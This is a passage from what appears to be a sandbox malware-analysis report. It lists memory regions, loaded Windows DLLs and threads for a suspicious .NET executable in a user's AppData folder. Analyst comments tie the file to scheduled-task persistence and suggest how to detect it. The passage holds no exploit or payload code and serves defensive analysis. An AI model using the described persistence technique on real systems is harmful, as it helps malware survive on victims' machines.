start_va = 0x7fefcaf0000
end_va = 0x7fefcb07fff
monitored = 0
entry_point = 0x7fefcaf3b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 2462
start_va = 0xe0000
end_va = 0x124fff
monitored = 0
entry_point = 0xe1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2463
start_va = 0xe0000
end_va = 0x124fff
monitored = 0
entry_point = 0xe1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2464
start_va = 0xe0000
end_va = 0x124fff
monitored = 0
entry_point = 0xe1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2465
start_va = 0xe0000
end_va = 0x124fff
monitored = 0
entry_point = 0xe1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2466
start_va = 0xe0000
end_va = 0x124fff
monitored = 0
entry_point = 0xe1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2467
start_va = 0x7fefc7f0000
end_va = 0x7fefc836fff
monitored = 0
entry_point = 0x7fefc7f1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2468
start_va = 0x7feff540000
end_va = 0x7feff5b0fff
monitored = 0
entry_point = 0x7feff551e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2469
start_va = 0xe0000
end_va = 0x15ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 2470
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 2471
start_va = 0x7fefd0c0000
end_va = 0x7fefd0e4fff
monitored = 0
entry_point = 0x7fefd0c9658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 2472
start_va = 0x1c50000
end_va = 0x1d4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c50000"
filename = ""
Region:
id = 2473
start_va = 0x1d70000
end_va = 0x1deffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d70000"
filename = ""
Region:
id = 2474
start_va = 0x1e30000
end_va = 0x1eaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e30000"
filename = ""
Region:
id = 2475
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 2476
start_va = 0x1eb0000
end_va = 0x217efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2477
start_va = 0x7fefd1e0000
end_va = 0x7fefd1f3fff
monitored = 0
entry_point = 0x7fefd1e10e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 2478
start_va = 0x2200000
end_va = 0x227ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002200000"
filename = ""
Region:
id = 2479
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 2480
start_va = 0x22d0000
end_va = 0x234ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022d0000"
filename = ""
Region:
id = 2481
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 2482
start_va = 0x160000
end_va = 0x160fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000160000"
filename = ""
Region:
id = 2483
start_va = 0x7fefd950000
end_va = 0x7fefd9e8fff
monitored = 0
entry_point = 0x7fefd951c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2484
start_va = 0x7fefa490000
end_va = 0x7fefa498fff
monitored = 0
entry_point = 0x7fefa4911a0
region_type = mapped_file
name = "tschannel.dll"
filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll")
Region:
id = 2485
start_va = 0x7fefbb50000
end_va = 0x7fefbba5fff
monitored = 0
entry_point = 0x7fefbb5bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2486
start_va = 0x2350000
end_va = 0x24affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002350000"
filename = ""
Region:
id = 2487
start_va = 0x2350000
end_va = 0x242efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002350000"
filename = ""
Region:
id = 2488
start_va = 0x2430000
end_va = 0x24affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002430000"
filename = ""
Region:
id = 2489
start_va = 0x7fefb720000
end_va = 0x7fefb737fff
monitored = 0
entry_point = 0x7fefb721130
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 2490
start_va = 0x7fefb6e0000
end_va = 0x7fefb714fff
monitored = 0
entry_point = 0x7fefb6e1064
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 2491
start_va = 0x25c0000
end_va = 0x263ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000025c0000"
filename = ""
Region:
id = 2492
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Thread:
id = 46
os_tid = 0x4d4
Thread:
id = 47
os_tid = 0x4ec
Thread:
id = 48
os_tid = 0x4f8
Thread:
id = 49
os_tid = 0x514
Thread:
id = 50
os_tid = 0x518
Thread:
id = 51
os_tid = 0x51c
Thread:
id = 52
os_tid = 0x52c
Process:
# Analyst note: an executable under the user's roaming AppData directory,
# started by the taskeng.exe process recorded above (parent_id = "7",
# os_parent_pid = "0x4d0" equals that process's os_pid). A Task Scheduler host
# launching a binary from a user-writable profile path is consistent with
# scheduled-task persistence; the task definition itself is not in this part of
# the log. Detection angle: scheduled-task actions whose target lies under
# %APPDATA%.
# NOTE(review): the file name differs from the hash-named analysis target at the
# top of the log; whether this is a copy of that sample is not shown here -
# compare file hashes.
id = "8"
image_name = "nfxioujoilco.exe"
filename = "c:\\users\\keecfmwgj\\appdata\\roaming\\nfxioujoilco.exe"
page_root = "0x1f88c000"
os_pid = "0x530"
# 0x2000 is the medium mandatory integrity level, the same as the parent
# taskeng.exe; the analysis target ran at 0x3000 (high).
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "7"
os_parent_pid = "0x4d0"
cmd_line = "C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe "
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
# The wow64*.dll and SysWOW64 modules in this process's region list agree with
# a 32-bit image.
bitness = "32"
# NOTE(review): as for the parent, BUILTIN\Administrators is marked [0x10];
# presumably the deny-only attribute, i.e. the process is not running elevated - confirm.
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f343" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2662
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2663
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 2664
start_va = 0x40000
end_va = 0x40fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2665
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 2666
start_va = 0x60000
end_va = 0x60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 2667
start_va = 0x70000
end_va = 0x16ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 2668
start_va = 0x210000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 2669
start_va = 0xec0000
end_va = 0xf89fff
monitored = 1
entry_point = 0xf84c4e
region_type = mapped_file
name = "nfxioujoilco.exe"
filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\nfxioujoilco.exe")
Region:
id = 2670
start_va = 0x772b0000
end_va = 0x77458fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2671
start_va = 0x77490000
end_va = 0x7760ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 2672
start_va = 0x7efb0000
end_va = 0x7efd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 2673
start_va = 0x7efdb000
end_va = 0x7efddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 2674
start_va = 0x7efde000
end_va = 0x7efdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 2675
start_va = 0x7efdf000
end_va = 0x7efdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 2676
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 2677
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2678
start_va = 0x7fff0000
end_va = 0x7fffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 2679
start_va = 0x250000
end_va = 0x4bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 2680
start_va = 0x73c20000
end_va = 0x73c5efff
monitored = 0
entry_point = 0x73c4e088
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 2681
start_va = 0x73bc0000
end_va = 0x73c1bfff
monitored = 0
entry_point = 0x73bff9f4
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 2682
start_va = 0x73bb0000
end_va = 0x73bb7fff
monitored = 0
entry_point = 0x73bb20f8
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 2683
start_va = 0x77190000
end_va = 0x772aefff
monitored = 0
entry_point = 0x771a5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2684
start_va = 0x76b80000
end_va = 0x76c8ffff
monitored = 0
entry_point = 0x76b93283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 2685
start_va = 0x77190000
end_va = 0x772aefff
monitored = 0
entry_point = 0x771a5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2686
start_va = 0x77190000
end_va = 0x772aefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000077190000"
filename = ""
Region:
id = 2687
start_va = 0x77090000
end_va = 0x77189fff
monitored = 0
entry_point = 0x770aa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2688
start_va = 0x77090000
end_va = 0x77189fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000077090000"
filename = ""
Region:
id = 2689
start_va = 0x4c0000
end_va = 0x7affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004c0000"
filename = ""
Region:
id = 2690
start_va = 0x73a90000
end_va = 0x73ad9fff
monitored = 1
entry_point = 0x73a92e54
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll")
Region:
id = 2691
start_va = 0x76b80000
end_va = 0x76c8ffff
monitored = 0
entry_point = 0x76b93283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 2692
start_va = 0x75160000
end_va = 0x751a6fff
monitored = 0
entry_point = 0x751674c1
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 2693
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2694
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2695
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2696
start_va = 0x170000
end_va = 0x1d6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2697
start_va = 0x250000
end_va = 0x37ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 2698
start_va = 0x440000
end_va = 0x4bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000440000"
filename = ""
Region:
id = 2699
start_va = 0x250000
end_va = 0x2affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 2700
start_va = 0x370000
end_va = 0x37ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000370000"
filename = ""
Region:
id = 2705
start_va = 0x76a50000
end_va = 0x76aeffff
monitored = 0
entry_point = 0x76a649e5
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 2706
start_va = 0x75670000
end_va = 0x7571bfff
monitored = 0
entry_point = 0x7567a472
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 2707
start_va = 0x75500000
end_va = 0x75518fff
monitored = 0
entry_point = 0x75504975
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 2708
start_va = 0x75310000
end_va = 0x753fffff
monitored = 0
entry_point = 0x75320569
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 2709
start_va = 0x74fe0000
end_va = 0x7503ffff
monitored = 0
entry_point = 0x74ffa3b3
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 2710
start_va = 0x74fd0000
end_va = 0x74fdbfff
monitored = 0
entry_point = 0x74fd10e1
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 2711
start_va = 0x4c0000
end_va = 0x59ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004c0000"
filename = ""
Region:
id = 2712
start_va = 0x6b0000
end_va = 0x7affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006b0000"
filename = ""
Region:
id = 2719
start_va = 0x73930000
end_va = 0x739bcfff
monitored = 1
entry_point = 0x73942860
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")
Region:
id = 2854
start_va = 0x73a80000
end_va = 0x73a82fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-synch-l1-2-0.dll"
filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll")
Region:
id = 2889
start_va = 0x751e0000
end_va = 0x75236fff
monitored = 0
entry_point = 0x751f9ba6
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 2890
start_va = 0x76af0000
end_va = 0x76b7ffff
monitored = 0
entry_point = 0x76b06343
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 2891
start_va = 0x76c90000
end_va = 0x76d8ffff
monitored = 0
entry_point = 0x76cab6ed
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 2892
start_va = 0x77460000
end_va = 0x77469fff
monitored = 0
entry_point = 0x774636a0
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 2893
start_va = 0x75270000
end_va = 0x7530cfff
monitored = 0
entry_point = 0x752a3fd7
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 2894
start_va = 0x7b0000
end_va = 0x937fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007b0000"
filename = ""
Region:
id = 2895
start_va = 0x20000
end_va = 0x3dfff
monitored = 0
entry_point = 0x3158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 2896
start_va = 0x20000
end_va = 0x3dfff
monitored = 0
entry_point = 0x3158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 2897
start_va = 0x769a0000
end_va = 0x769fffff
monitored = 0
entry_point = 0x769b158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 2898
start_va = 0x75040000
end_va = 0x7510bfff
monitored = 0
entry_point = 0x7504168b
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 2899
start_va = 0x20000
end_va = 0x20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2900
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 2901
start_va = 0x940000
end_va = 0xac0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000940000"
filename = ""
Region:
id = 2902
start_va = 0xf90000
end_va = 0x238ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f90000"
filename = ""
Region:
id = 2942
start_va = 0x4c0000
end_va = 0x583fff
monitored = 1
entry_point = 0x584c4e
region_type = mapped_file
name = "nfxioujoilco.exe"
filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\nfxioujoilco.exe")
Region:
id = 2943
start_va = 0x590000
end_va = 0x59ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000590000"
filename = ""
Region:
id = 2966
start_va = 0x4c0000
end_va = 0x583fff
monitored = 1
entry_point = 0x584c4e
region_type = mapped_file
name = "nfxioujoilco.exe"
filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\nfxioujoilco.exe")
Region:
id = 2967
start_va = 0x74fb0000
end_va = 0x74fb8fff
monitored = 0
entry_point = 0x74fb1220
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 2968
start_va = 0x74800000
end_va = 0x74faefff
monitored = 1
entry_point = 0x7481d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 2969
start_va = 0x74800000
end_va = 0x74faefff
monitored = 1
entry_point = 0x7481d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 3109
start_va = 0x74800000
end_va = 0x74faefff
monitored = 1
entry_point = 0x7481d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 3131
start_va = 0x73b90000
end_va = 0x73ba3fff
monitored = 0
entry_point = 0x73b9ac00
region_type = mapped_file
name = "vcruntime140_clr0400.dll"
filename = "\\Windows\\SysWOW64\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140_clr0400.dll")
Region:
id = 3134
start_va = 0x73ae0000
end_va = 0x73b8afff
monitored = 0
entry_point = 0x73b75f20
region_type = mapped_file
name = "ucrtbase_clr0400.dll"
filename = "\\Windows\\SysWOW64\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase_clr0400.dll")
Region:
id = 3193
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 3194
start_va = 0x1f0000
end_va = 0x1fffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 3195
start_va = 0x200000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 3196
start_va = 0x250000
end_va = 0x25ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 3197
start_va = 0x270000
end_va = 0x2affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000270000"
filename = ""
Region:
id = 3198
start_va = 0x260000
end_va = 0x26ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000260000"
filename = ""
Region:
id = 3199
start_va = 0x2b0000
end_va = 0x2bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 3200
start_va = 0x2c0000
end_va = 0x2cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 3201
start_va = 0x2d0000
end_va = 0x2d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002d0000"
filename = ""
Region:
id = 3202
start_va = 0x2e0000
end_va = 0x2e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002e0000"
filename = ""
Region:
id = 3203
start_va = 0xad0000
end_va = 0xc9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ad0000"
filename = ""
Region:
id = 3204
start_va = 0xad0000
end_va = 0xc5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ad0000"
filename = ""
Region:
id = 3205
start_va = 0xc60000
end_va = 0xc9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c60000"
filename = ""
Region:
id = 3206
start_va = 0x330000
end_va = 0x36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000330000"
filename = ""
Region:
id = 3207
start_va = 0xd60000
end_va = 0xe5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d60000"
filename = ""
Region:
id = 3208
start_va = 0x7efd8000
end_va = 0x7efdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 3209
start_va = 0x2f0000
end_va = 0x2fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 3210
start_va = 0x2390000
end_va = 0x438ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002390000"
filename = ""
Region:
id = 3211
start_va = 0x380000
end_va = 0x41ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000380000"
filename = ""
Region:
id = 3212
start_va = 0x4f0000
end_va = 0x52ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004f0000"
filename = ""
Region:
id = 3213
start_va = 0xb10000
end_va = 0xc0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 3214
start_va = 0xc20000
end_va = 0xc5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c20000"
filename = ""
Region:
id = 3215
start_va = 0x7efd5000
end_va = 0x7efd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd5000"
filename = ""
Region:
id = 3216
start_va = 0xcb0000
end_va = 0xceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000cb0000"
filename = ""
Region:
id = 3217
start_va = 0x4530000
end_va = 0x462ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004530000"
filename = ""
Region:
id = 3218
start_va = 0x7efad000
end_va = 0x7efaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efad000"
filename = ""
Region:
id = 3219
start_va = 0x4630000
end_va = 0x48fefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 3220
start_va = 0x72520000
end_va = 0x7392afff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorlib.ni.dll"
